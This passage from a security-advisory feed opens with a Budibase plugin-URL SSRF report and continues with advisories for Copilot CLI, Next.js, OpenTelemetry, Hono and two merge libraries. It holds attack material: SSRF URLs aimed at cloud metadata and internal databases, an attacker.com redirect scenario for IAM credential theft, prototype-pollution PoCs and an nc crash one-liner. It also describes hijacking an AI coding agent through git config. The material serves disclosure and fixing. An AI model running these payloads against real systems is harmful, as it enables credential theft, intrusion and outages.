ranges. But the URL validation layer itself is broken regardless, and it directly enables SSRF in two realistic situations: (1) when chained with the `BLACKLIST_IPS` bypass ([001]), where the blacklist is empty; and (2) when the plugin server follows HTTP redirects from an external URL to an internal target (the default `node-fetch` behavior with `redirect: 'follow'`). The developer team's own test suite (`objectStore.spec.ts:393`) tests that `downloadTarballDirect` passes through `fetchWithBlacklist` — confirming they're aware of the SSRF risk on this path. The `.tar.gz` substring check as the only URL-level guard was never intended to be the security boundary, but in practice it is. --- ## 3. Root Cause Analysis ### 3.1 Trivial substring-based URL validation **File**: `packages/server/src/api/controllers/plugin/url.ts` ```typescript // Lines 7-19 export async function urlUpload(url: string, name = "", headers = {}) { if (!url.includes(".tar.gz")) { // ← ONLY validation: any URL with ".tar.gz" anywhere passes throw new Error("Plugin must be compressed into a gzipped tarball.") } const path = await downloadUnzipTarball(url, name, headers) // ↑ url is passed directly — no host allowlist, no scheme check, no path normalization try { return await getPluginMetadata(path) } catch (err) { deleteFolderFileSystem(path) throw err } } ``` **Problem**: `url.includes(".tar.gz")` checks for a substring anywhere in the full URL string. It does not validate hostname, scheme, or that `.tar.gz` appears as an actual file extension at the end of the path. ### 3.2 Bypass examples | Attack URL | `includes(".tar.gz")` | Actual request target | |------------|----------------------|----------------------| | `http://169.254.169.254/.tar.gz` | ✅ passes | AWS IMDS | | `http://127.0.0.1:4005/_session.tar.gz` | ✅ passes | CouchDB | | `http://10.0.0.1:6379/.tar.gz` | ✅ passes | Redis | | `http://attacker.com/file.tar.gz?x=http://internal/` | ✅ passes | Redirect to internal | | `http://internal-host/.tar.gz#fragment` | ✅ passes | Internal service | ### 3.3 Developer awareness of SSRF risk on this path **File**: `packages/backend-core/src/objectStore/tests/objectStore.spec.ts` ```typescript // Line 393 it("uses fetchWithBlacklist in downloadTarballDirect", async () => { downloadTarballDirect("http://169.254.169.254/metadata/v1/", "tmp") // ← team explicitly tests that IMDS is blocked via blacklist }) ``` The team knows this code path can reach IMDS. They rely on `fetchWithBlacklist` as the defense — but never tested the `.tar.gz` substring bypass that trivially routes around it at the URL validation layer. ### 3.4 Authorization model | Operation | Endpoint | Required Permission | |-----------|----------|---------------------| | Plugin URL upload | `POST /api/plugin` | Global Builder | **Key insight**: The plugin endpoint is behind `globalBuilderRoutes`, which requires Global Builder permission. This is a low-privilege role routinely granted to developers on self-hosted instances. --- ## 4. Impact Analysis ### 4.1 Confidentiality — High (chained) / Low (standalone) When chained with [001] (`BLACKLIST_IPS` bypass): - **AWS/GCP/Azure IMDS** (`169.254.169.254`) — IAM credentials, service account tokens - **CouchDB** (`127.0.0.1:4005`) — application databases, user records - **Redis** (`127.0.0.1:6379`) — session tokens - **Internal network services** (`172.16.0.0/12`, `10.0.0.0/8`) Standalone (with default blacklist active): - **Open redirect chains** — if the plugin server follows redirects from external URLs to internal IPs, the blacklist check on the original URL does not protect against the redirected destination. This depends on `node-fetch` redirect behavior and whether `fetchWithBlacklist` re-checks the redirected URL. ### 4.2 Integrity — None (GET-only path) The plugin URL upload uses GET-only semantics via `fetchWithBlacklist`. No write operations to internal services via this path. ### 4.3 Availability — None No service disruption. ### 4.4 Scope Change (chained) Same as [001]: crosses application → infrastructure boundary when combined with the blacklist bypass. --- ## 5. Proof of Concept > **Verification status**: Code-level confirmed. End-to-end Docker test pending. > PoC files are ready: `poc/004_plugin_url_ssrf/poc_004_plugin_url_ssrf.py` + `docker-compose.yml` ### 5.1 Environment Setup ```bash # poc/004_plugin_url_ssrf/docker-compose.yml services: budibase: image: budibase/budibase:latest environment: SELF_HOSTED: "1" BLACKLIST_IPS: "" # ← enables chained SSRF (001) JWT_SECRET: "poc_jwt_secret" BB_ADMIN_USER_EMAIL: "poc@budibase.com" BB_ADMIN_USER_PASSWORD: "pocPassword123!" ports: ["10000:10000"] victim: image: python:3.11-alpine command: python -m http.server 8888 ``` ```bash cd poc/004_plugin_url_ssrf docker-compose up -d python3 poc_004_plugin_url_ssrf.py --target http://localhost:10000 ``` ### 5.2 Step 1 — Bypass the `.tar.gz` check with a crafted URL ```http POST /api/plugin HTTP/1.1 Host: localhost:10000 Cookie: budibase:auth=<builder-session-cookie> Content-Type: application/json { "source": "URL", "url": "http://victim:8888/.tar.gz", "name": "poc-test" } ``` The `url.includes(".tar.gz")` check passes because `.tar.gz` appears in the path. The URL `http://victim:8888/.tar.gz` is not a valid tarball — but the string check doesn't know that. ### 5.3 Step 2 — Expected response (SSRF confirmed) **With blacklist active (default config):** ```json { "message": "Failed to import plugin: URL is blocked or could not be resolved safely." } ``` **With `BLACKLIST_IPS=""` (chained with 001):** ```json { "message": "Failed to import plugin: incorrect header check" } ``` The `"incorrect header check"` error (zlib decompressor receiving HTTP response headers) proves the request reached `victim:8888`. The `.tar.gz` substring check was bypassed, and the HTTP fetch completed. ### 5.4 Additional bypass payloads tested (code-level only) | URL | Check bypass | Intended target | |-----|-------------|-----------------| | `http://169.254.169.254/.tar.gz` | ✅ | AWS IMDS | | `http://127.0.0.1:4005/_session.tar.gz` | ✅ | CouchDB | | `http://127.0.0.1:6379/.tar.gz` | ✅ | Redis | | `http://attacker.com/real.tar.gz` (redirects to `http://10.0.0.1/`) | ✅ | Internal via redirect | --- ## 6. Attack Scenarios ### Scenario A — Chained with [001]: AWS IMDS credential theft ``` 1. Self-hosted deployment has BLACKLIST_IPS set to any value (see report 001) 2. Builder user sends: POST /api/plugin { "source": "URL", "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name.tar.gz" } 3. Budibase fetches IMDS endpoint → receives IAM credentials JSON 4. zlib decompressor fails on non-gzip content → error response 5. Depending on logging config, credential material may appear in logs or error details ``` ### Scenario B — Standalone: Open redirect SSRF (default config) ``` 1. Attacker controls external server: GET /plugin.tar.gz → 302 → http://192.168.1.1/admin 2. Builder user submits: POST /api/plugin { "source": "URL", "url": "http://attacker.com/plugin.tar.gz" } 3. node-fetch follows redirect (default: redirect: 'follow') 4. If fetchWithBlacklist only checks the original URL (not the redirected URL), internal IP is reached 5. Requires verification of redirect handling in fetchWithBlacklist ``` ### Scenario C — CouchDB data access (chained) ``` 1. BLACKLIST_IPS="" enables internal access 2. URL: http://127.0.0.1:4005/_all_dbs.tar.gz 3. CouchDB responds with JSON list of databases 4. zlib error confirms HTTP request reached CouchDB ``` --- ## 7. Affected Code Paths ``` POST /api/plugin (Global Builder auth) │ ▼ packages/server/src/api/controllers/plugin/index.ts │ source === "URL" → urlUpload(url, name, headers) ▼ packages/server/src/api/controllers/plugin/url.ts:8 │ if (!url.includes(".tar.gz")) throw ← ONLY check — trivially bypassed │ → "http://169.254.169.254/.tar.gz" passes ▼ packages/server/src/utilities/fileSystem/plugins.ts │ downloadUnzipTarball(url, name, headers) ▼ packages/backend-core/src/objectStore/objectStore.ts:703 │ downloadTarballDirect(url, path, headers) ▼ packages/backend-core/src/objectStore/utils/outboundFetch.ts │ fetchWithBlacklist(url, options) │ isBlacklisted(hostname) │ ├─ [default config] → BlockList has 9 private ranges → 169.254.x BLOCKED ✓ │ └─ [BLACKLIST_IPS set, chained with 001] → empty BlockList → 169.254.x REACHABLE ✗ ``` --- ## 8. Recommended Fixes ### Fix 1 (High): Replace substring check with URL parsing and extension validation ```typescript // packages/server/src/api/controllers/plugin/url.ts import { URL } from "url" export async function urlUpload(url: string, name = "", headers = {}) { let parsed: URL try { parsed = new URL(url) } catch { throw new Error("Invalid plugin URL.") } // Only allow https:// scheme if (parsed.protocol !== "https:") { throw new Error("Plugin URL must use HTTPS.") } // Require the path to end with .tar.gz (not just contain it anywhere) if (!parsed.pathname.endsWith(".tar.gz")) { throw new Error("Plugin must be compressed into a gzipped tarball (.tar.gz).") } const path = await downloadUnzipTarball(url, name, headers) // ... } ``` ### Fix 2 (High): Re-check blacklist after redirect in `fetchWithBlacklist` ```typescript // packages/backend-core/src/objectStore/utils/outboundFetch.ts // Current: only checks the original URL before fetch // Fix: also intercept redirects and re-check each redirect target const response = await nodeFetch(url, { ...options, redirect: "manual", // don't auto-follow }) if (response.status >= 300 && response.status < 400) { const redirectUrl = response.headers.get("location") if (redirectUrl) { const redirectHost = new URL(redirectUrl).hostname if (await isBlacklisted(redirectHost)) { throw new Error("URL is blocked or could not be resolved safely.") } // recursively fetch (with depth limit) } } ``` ### Fix 3 (Medium): Add hostname allowlist option for plugin sources Provide a `PLUGIN_ALLOWED_HOSTS` variable that restricts plugin URL downloads to explicitly approved domains, rather than relying solely on a blocklist. --- ## 9. References - **CWE-918**: Server-Side Request Forgery (SSRF) — https://cwe.mitre.org/data/definitions/918.html - **CWE-184**: Incomplete List of Disallowed Inputs — https://cwe.mitre.org/data/definitions/184.html - **OWASP SSRF Prevention Cheat Sheet** — https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html - **Related finding**: [001] `BLACKLIST_IPS` bypass — `report/raw/001_ssrf_blacklist_bypass.md` - **Developer SSRF awareness test**: `packages/backend-core/src/objectStore/tests/objectStore.spec.ts:393`

الإصدارات المتأثرة

All versions < 3.35.10

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

المراجع

الوصف الكامل

## Summary A security vulnerability has been identified in GitHub Copilot CLI where a malicious bare git repository nested inside a project directory can achieve arbitrary code execution when the agent performs git operations. By exploiting git's automatic bare repository discovery during directory traversal, an attacker can set `core.fsmonitor` or other executable config keys to run arbitrary commands without user awareness or approval. ## Details Git supports bare repositories — repositories without a working tree — which can be discovered automatically when git traverses the directory hierarchy looking for a `.git` directory. When git discovers a bare repository, it reads and applies its configuration, including keys that specify external commands to execute. The vulnerability arises because git's `core.fsmonitor` config key (and 15+ similar keys such as `core.hookspath`, `diff.external`, `merge.tool`, etc.) can specify arbitrary shell commands that git will execute as part of normal operations like `status`, `diff`, or `rev-parse`. ### Attack Scenario An attacker can exploit this by: 1. Creating a bare git repository nested inside a seemingly normal project directory (e.g., `vendor/malicious.git/` or a deeply nested subdirectory) 2. Configuring `core.fsmonitor` (or similar keys) in that bare repository to execute a malicious command 3. When GitHub Copilot CLI performs any git operation that traverses into or through that directory, git auto-discovers the bare repository, reads its config, and executes the attacker's command This can occur when: - The agent navigates into a subdirectory containing the buried bare repo - The agent runs `git status`, `git diff`, or other routine git commands - The agent uses tools like `grep` or `glob` that may trigger git operations in subdirectories Prior to the fix, the CLI had no protection against git auto-discovering bare repositories during directory traversal. ## Impact An attacker who can place a malicious bare repository inside a project — for example, through: - A pull request adding a directory that contains a bare repository - A compromised or malicious dependency that includes a bare repository - A cloned repository that already contains nested bare repositories — could achieve arbitrary code execution on the user's workstation whenever GitHub Copilot CLI performs git operations in or near the malicious directory. Successful exploitation could lead to data exfiltration, credential theft, file modification, or further system compromise. ## Affected Versions - GitHub Copilot CLI versions prior to 1.0.42 ## Remediation and Mitigation ### Fix The fix sets `safe.bareRepository=explicit` via git's `GIT_CONFIG_COUNT` / `GIT_CONFIG_KEY_*` / `GIT_CONFIG_VALUE_*` environment variable mechanism, which has the highest precedence over all config file sources. This prevents git from automatically discovering and using bare repositories during directory traversal — only explicitly allowlisted bare repositories will be used. ### User Actions 1. **Upgrade** GitHub Copilot CLI to **1.0.43** or later. 2. **Exercise caution** when working in repositories that contain nested bare git repositories. 3. **Review** project directories for unexpected bare repositories, especially in `vendor/`, `third_party/`, or deeply nested subdirectories.

الإصدارات المتأثرة

All versions < 1.0.43

CVSS Vector

CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

المراجع

الوصف الكامل

### Impact Next.js uses the `x-nextjs-data` request header for internal data requests. On affected versions, an external client could send this header on a normal request to a path handled by middleware that returns a redirect. When that happened, the middleware/proxy could treat the request as a data request and replace the standard `Location` redirect header with the internal `x-nextjs-redirect` header. Browsers do not follow `x-nextjs-redirect`, so the response became an unusable redirect for normal clients. If the application was deployed behind a CDN or reverse proxy that caches 3xx responses without varying on this header, a single attacker request could poison the cached redirect response for the affected path. Subsequent visitors could then receive a cached redirect response without a `Location` header, causing a denial of service for that redirect path until the cache entry expired or was purged. ### Affected scenarios This affects applications that: - use middleware or proxy redirects - are deployed behind a caching CDN or reverse proxy - allow 3xx responses on those paths to be cached without differentiating internal data requests from normal requests ### Fix The fix stops trusting `x-nextjs-data` by itself for middleware redirect handling. A request is now treated as an internal data request only when it is validated as such by internal routing state, preserving legitimate data-request redirect behavior while preventing external header injection from changing normal redirect responses. ### Workarounds Before upgrading, users can reduce risk by: - configuring the CDN or reverse proxy to vary its cache key on `x-nextjs-data` for affected responses

الإصدارات المتأثرة

12.2.0 → 15.5.16

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

المراجع

الوصف الكامل

## Summary `@theecryptochad/merge-guard` versions prior to 1.0.1 are vulnerable to Prototype Pollution via the `deepMerge()` function. An attacker who controls the source object can inject `__proto__` keys that mutate `Object.prototype`, affecting all objects in the Node.js runtime. ## Details The `deepMerge()` function recursively merges two objects without sanitizing reserved property keys (`__proto__`, `constructor`, `prototype`). When a source object contains a `__proto__` key, its value is assigned to `target.__proto__`, which JavaScript engines interpret as a write to `Object.prototype`. ## Proof of Concept ```js const { deepMerge } = require('@theecryptochad/merge-guard'); const payload = JSON.parse('{"__proto__":{"isAdmin":true}}'); deepMerge({}, payload); console.log({}.isAdmin); // true — Object.prototype is polluted ``` ## Impact Any application using `deepMerge()` with untrusted input (e.g. user-supplied JSON from HTTP requests, WebSocket messages, or config files) is vulnerable. An attacker can inject arbitrary properties onto `Object.prototype`, enabling privilege escalation, application logic bypass, and property injection. ## Remediation Upgrade to `@theecryptochad/merge-guard >= 1.0.1`, which adds an explicit blocklist: ```js const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']); if (BLOCKED.has(key)) continue; ``` ## References - [CWE-1321: Improper Neutralization of Special Elements in Object Keys](https://cwe.mitre.org/data/definitions/1321.html) - [OWASP: Prototype Pollution](https://owasp.org/www-community/attacks/Prototype_Pollution) - [Fix commit](https://github.com/TheeCryptoChad/merge-guard/releases/tag/v1.0.1)

الإصدارات المتأثرة

All versions < 1.0.1

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

المراجع

الوصف الكامل

## Summary `setPath` in `@rvf/set-get` (used by `@rvf/core` to flatten incoming form data into a nested object) does not block the keys `__proto__`, `constructor`, or `prototype` when walking a path. Because field names in submitted form data are passed directly to `setPath` via `preprocessFormData` (and through `parseFormData` / `validate`), an attacker who can submit a form to a Remix / React Router app using the library can set arbitrary properties on `Object.prototype` of the running server process. This is a default-reachable prototype pollution primitive: no special configuration is required. Any endpoint that accepts a form via `parseFormData` or runs a validator created with `createValidator` is affected. ## Affected versions - `@rvf/set-get` `< 7.0.2` (7.x line) - `@rvf/set-get` `< 6.0.4` (6.x line) Reached through `@rvf/core` versions that depend on a vulnerable `@rvf/set-get` (current `8.1.0` resolves to `7.0.1` without the override). ## Patched - `@rvf/set-get` `7.0.2` - `@rvf/set-get` `6.0.4` The fix adds a `REJECT_KEYS` blocklist (`__proto__`, `constructor`, `prototype`) and throws when one is encountered while walking a path inside `setPath`. ## Proof of concept Install a vulnerable resolution and run on Node 18+: ```json { "dependencies": { "@rvf/core": "8.1.0" }, "overrides": { "@rvf/set-get": "7.0.1" } } ``` ```js const { preprocessFormData } = require('@rvf/core'); const form = new FormData(); form.append("username", "alice"); form.append("__proto__[polluted]", "yes"); preprocessFormData(form); console.log(({}).polluted); // -> 'yes' ``` The field name `__proto__[polluted]` is the kind of value an attacker can submit from any HTML form or HTTP client. After the call, every plain object in the process inherits `polluted = 'yes'`. A second working payload is `constructor.prototype.<key>=<value>`, which goes through `setPath` walking `constructor` then `prototype`. ## Impact - Any property assignable on `Object.prototype` of the server process, set by a single unauthenticated HTTP request. - Persists for the life of the worker process and affects every subsequent request handled by the same process. - Direct downstream consequences depend on the host application and the rest of its dependency tree, but typical risks include: bypassing `if (obj.isAdmin)` style checks, injecting unintended config values into objects merged with user input, breaking template rendering, and crashing the worker by polluting properties used by other libraries (DoS). - Worth noting: the visible output of `preprocessFormData` does not contain the malicious key, so the attack leaves no obvious trace in request logs that show parsed bodies. ## CVSS `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L` (8.2, High) Integrity is High because the primitive lets the attacker change the meaning of property reads on every object in the process. Confidentiality is None and Availability is Low without a named downstream gadget; both could be higher in a specific consuming app. ## Remediation for users Upgrade to `@rvf/set-get` `7.0.2` or `6.0.4`. If you cannot upgrade `@rvf/core` directly, an `npm` / `pnpm` override on `@rvf/set-get` works. ## Credit Reported by Mohamed Bassia (@0xBassia).

الإصدارات المتأثرة

7.0.0 → 7.0.2

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

المراجع

الوصف الكامل

### Impact App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. ### Fix We now reject or ignore malformed nonce values before they are embedded into HTML and apply stricter nonce sanitization so request-derived nonce data cannot break out of the intended attribute context. ### Workarounds If you cannot upgrade immediately, strip inbound `Content-Security-Policy` request headers from untrusted traffic.

الإصدارات المتأثرة

13.4.0 → 15.5.16

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

المراجع

الوصف الكامل

### Impact React Server Component responses can be vulnerable to cache poisoning in deployments that rely on shared caches with insufficient response partitioning. In affected conditions, collisions in the `_rsc` cache-busting value can allow an attacker to poison cache entries so users receive the wrong response variant for a given URL. ### Fix We strengthened the `_rsc` cache-busting mechanism to make practical collisions significantly harder and to better separate response variants that should not share cache entries. ### Workarounds If you cannot upgrade immediately, ensure intermediary caches correctly honor `Vary` for RSC-related request headers, or disable shared caching for affected RSC responses until you can deploy a patched release.

الإصدارات المتأثرة

13.4.6 → 15.5.16

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

### Impact Applications that use `beforeInteractive` scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. ### Fix We now HTML-escape serialized `beforeInteractive` script content before embedding it into the page, preventing attacker-controlled content from breaking out of the inline script boundary. ### Workarounds If you cannot upgrade immediately, do not pass untrusted data into `beforeInteractive` scripts. If that pattern is unavoidable, sanitize or escape the content before embedding it.

الإصدارات المتأثرة

13.0.0 → 15.5.16

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

المراجع

الوصف الكامل

### Impact Applications using Partial Prerendering through the Cache Components feature can be vulnerable to connection exhaustion through crafted POST requests to a server action. In affected configurations, a malicious request can trigger a request-body handling deadlock that leaves connections open for an extended period, consuming file descriptors and server capacity until legitimate users are denied service. ### Fix We now treat the header used for resuming Partial Prerendered requests as an internal-only header and strip it from untrusted incoming requests. This header should never be accepted directly from external clients. ### Workarounds If you cannot upgrade immediately, block requests that would be handled by Next.js if they contain the `Next-Resume` header at the edge.

الإصدارات المتأثرة

15.0.0 → 15.5.16

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

المراجع

الوصف الكامل

### Impact When self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. An attacker could cause out-of-memory conditions by requesting large local assets from the `/_next/image` endpoint that match the `images.localPatterns` configuration (by default, all patterns are allowed). - If you are using `images.localPatterns`, only the patterns in that array are impacted. - If you are using `images.unoptimized: true`, you are NOT impacted. - If you are using `images.loader: 'custom'`, you are NOT impacted. - If you are using Vercel, you are NOT impacted. ### Fix We now apply response size limits consistently to internal image fetches, not just external ones, and fail oversized responses before they can exhaust process memory. This can be adjusted using the `images.maximumResponseBody` configuration. ### Workarounds If you cannot upgrade immediately, avoid routing large local assets through `/_next/image`, disable image optimization for large or untrusted local files, or block image optimization access to those assets at the edge. You can disable using the `images.localPatterns: []` configuration. This will still allow fetching remote images (which is not impacted).

الإصدارات المتأثرة

10.0.0 → 15.5.16

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

المراجع

الوصف الكامل

### Impact Self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. ### Fix We now apply the same safety checks to WebSocket upgrade handling that already existed for normal HTTP requests, so upgrade requests are only proxied when routing has explicitly marked them as safe external rewrites. ### Workarounds If you cannot upgrade immediately, do not expose the origin server directly to untrusted networks. If WebSocket upgrades are not required, block them at your reverse proxy or load balancer, and restrict origin egress to internal networks and metadata services where possible.

الإصدارات المتأثرة

13.4.13 → 15.5.16

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

المراجع

الوصف الكامل

### Impact Applications using React Server Components can be vulnerable to cache poisoning when shared caches do not correctly partition response variants. Under affected conditions, an attacker can cause an RSC response to be served from the original URL and poison shared cache entries so later visitors receive component payloads instead of the expected HTML. ### Fix We now validate and interpret `RSC` request headers consistently across request classification and rendering, and we enforce the intended cache-busting behavior so RSC payloads are not unexpectedly served from the original URL. ### Workarounds If you cannot upgrade immediately, ensure your CDN or reverse proxy keys on the relevant RSC request headers and honors `Vary`, or disable shared caching for affected App Router and RSC responses.

الإصدارات المتأثرة

14.2.0 → 15.5.16

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L

المراجع

الوصف الكامل

### Impact App Router applications that rely on middleware or proxy-based checks for authorization can allow unauthorized access through transport-specific route variants used for segment prefetching. In affected configurations, specially crafted `.rsc` and segment-prefetch URLs can resolve to the same page without being matched by the intended middleware rule, which can allow protected content to be reached without the expected authorization check. ### Fix We now include App Router transport variants when generating middleware matchers, so middleware protections are applied consistently to those requests as well as to the normal page URL. ### Workarounds If you cannot upgrade immediately, enforce authorization in the underlying route or page logic instead of relying solely on middleware.

الإصدارات المتأثرة

15.2.0 → 15.5.16

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

المراجع

الوصف الكامل

### Impact Applications that rely on middleware to protect dynamic routes can be vulnerable to authorization bypass. In affected deployments, specially crafted query parameters can alter the dynamic route value seen by the page while leaving the visible path unchanged, which can allow protected content to be rendered without passing the expected middleware check. ### Fix We now only honor internal route-parameter normalization in trusted routing flows and ignore externally supplied parameter encodings that should never have been accepted from ordinary requests. ### Workarounds If you cannot upgrade immediately, enforce authorization in route or page logic instead of relying solely on middleware path matching.

الإصدارات المتأثرة

15.4.0 → 15.5.16

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

المراجع

الوصف الكامل

### Impact Applications using the Pages Router with `i18n` configured and middleware/proxy-based authorization can allow unauthorized access to protected page data through locale-less `/_next/data/<buildId>/<page>.json` requests. In affected configurations, middleware does not run for the unprefixed data route, allowing an attacker to retrieve SSR JSON for protected pages without passing the intended authorization checks. ### Fix The matcher logic was updated to perform the same match as it would on a non-i18n data route. ### Workarounds If you cannot upgrade immediately, enforce authorization in the page's server-side data path instead of relying solely on middleware.

الإصدارات المتأثرة

12.2.0 → 15.5.16

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

المراجع

الوصف الكامل

### Impact `@vitejs/plugin-rsc` vendors `react-server-dom-webpack`, which contained a vulnerability in versions prior to 19.2.6. See details in React repository's advisory https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh ### Patches Upgrade immediately to `@vitejs/plugin-rsc@0.5.26` or later.

الإصدارات المتأثرة

All versions < 0.5.26

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

المراجع

الوصف الكامل

A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh). A specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.

الإصدارات المتأثرة

13.0.0 → 15.5.16

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

المراجع

الوصف الكامل

## Summary A single malformed HTTP request crashes any Node.js process running the OpenTelemetry JS Prometheus exporter. The metrics endpoint (default `0.0.0.0:9464`) has no error handling around URL parsing, so a request with an invalid URI causes an uncaught `TypeError` that terminates the process. **You are affected by this vulnerability if either of the following apply to your application:** * you directly use `@opentelemetry/exporter-prometheus` in your code through its built-in server. * your `OTEL_METRICS_EXPORTER` environment variable includes `prometheus` **AND** * you use `@opentelemetry/sdk-node` * you use `@opentelemetry/auto-instrumentations-node` via `--require @opentelemetry/auto-instrumentations-node/register`/`--import @opentelemetry/auto-instrumentations-node/register` ## Impact **Denial of service.** Any application using the OpenTelemetry Prometheus exporter’s built-in server can be crashed by a single unauthenticated network packet sent to the metrics port. No authentication, special privileges, or prior access is required. ## Remediation ### Update to the fixed version Update `@opentelemetry/exporter-prometheus` and `@opentelemetry/sdk-node` to version **0.217.0** or later. Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0** or later. This release adds proper error handling around the URL constructor, returning an HTTP `400` response on parse failure rather than allowing the exception to propagate and crash the process. ``` npm install @opentelemetry/exporter-prometheus@latest ``` ### Do Not Expose the Endpoint to Untrusted Users > [!IMPORTANT] > The following mitigations reduce exposure but do not fully remediate the vulnerability. Any client that *can* reach the metrics endpoint - including your own Prometheus scraper host if compromised - could still trigger the crash. Updating to **0.217.0** is the recommended resolution. If updating is not immediately feasible, restrict access to the metrics endpoint so that it is not reachable by untrusted or unauthenticated network clients. For example: * **Bind to localhost only** by setting the `host` option to `127.0.0.1` when configuring the `PrometheusExporter`, so the port is not exposed on public or shared network interfaces * **Use a firewall or network policy** to restrict access to port `9464` (or whichever port you have configured) to only trusted Prometheus scrape hosts * **Place the endpoint behind a reverse proxy** that filters or validates incoming requests before they reach the exporter ## Details In `PrometheusExporter.ts`, the `_requestHandler` calls `new URL(request.url, this._baseUrl)` without any error handling. Node's HTTP parser accepts absolute-form URIs (e.g. `http://`) for proxy compatibility, including malformed ones. When `request.url` is `"http://"`, the `URL` constructor throws `TypeError: Invalid URL`. Since there is no try-catch in the handler, the exception propagates as an uncaught exception and crashes the process. The Prometheus metrics endpoint is unauthenticated by design (Prometheus scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable by any network client that can connect to the metrics port. ## Proof of Concept Start any Node.js application with the Prometheus exporter running on the default port `9464`, then send a single raw TCP packet: ``` echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464 ``` The process crashes immediately with: ``` TypeError: Invalid URL at new URL (...) at PrometheusExporter._requestHandler (...) ```

الإصدارات المتأثرة

All versions < 0.217.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

المراجع

الوصف الكامل

### Summary The JSX renderer escapes `style` attribute object values for HTML but not for CSS. Untrusted input in a `style` object value or property name can therefore inject additional CSS declarations into the rendered `style` attribute. The impact is limited to CSS and does not allow JavaScript execution or HTML attribute breakout. ### Details `style` object values are serialized into a CSS declaration list and escaped for HTML attribute context only. Characters that act as CSS declaration boundaries — such as `;`, comment markers, quoted strings, and block delimiters — are valid in HTML attribute content and can extend a value beyond its assigned property. This issue arises when untrusted input is interpolated into a JSX `style` object and rendered server-side. ### Impact An attacker who can control the value or property name of a `style` object may inject arbitrary CSS declarations. This may lead to: - Visual manipulation of the page, including full-viewport overlays usable for phishing - Outbound requests to attacker-controlled hosts via CSS resource references such as `url(...)` - Hijacking of UI affordances through layout, positioning, or visibility changes This issue affects applications that render JSX on the server with `style` object values or property names derived from untrusted input.

الإصدارات المتأثرة

All versions < 4.12.18

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

### Summary Improper validation of the JWT NumericDate claims `exp`, `nbf`, and `iat` in `hono/utils/jwt` allows tokens with non-spec-compliant claim values to silently bypass time-based checks. This issue is not exploitable by an anonymous attacker; it only manifests when a malformed claim value reaches `verify()` — typically when the application itself issues such tokens, or when the signing key is otherwise under attacker control. ### Details The validation routine combined option, presence, and threshold checks in a single short-circuiting expression, so several classes of malformed values were silently skipped instead of rejected: - A falsy numeric value short-circuited the presence check. - A non-finite numeric value compared as never-after-now and never-expired. - A non-numeric type produced NaN comparisons that evaluated false. This deviates from RFC 7519 §4.1.4, which defines NumericDate as a finite JSON numeric value. ### Impact An actor able to issue tokens accepted by the application may craft tokens whose `exp`, `nbf`, or `iat` claims silently bypass time-based enforcement. This may lead to: - Tokens treated as never expiring even with `exp` configured on the verifier. - Tokens with a future `nbf` accepted as currently valid. - Tokens with a future `iat` accepted as legitimately issued. Deployments using a well-formed token issuer and protecting the signing key are not affected.

الإصدارات المتأثرة

All versions < 4.12.18

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

المراجع

الوصف الكامل

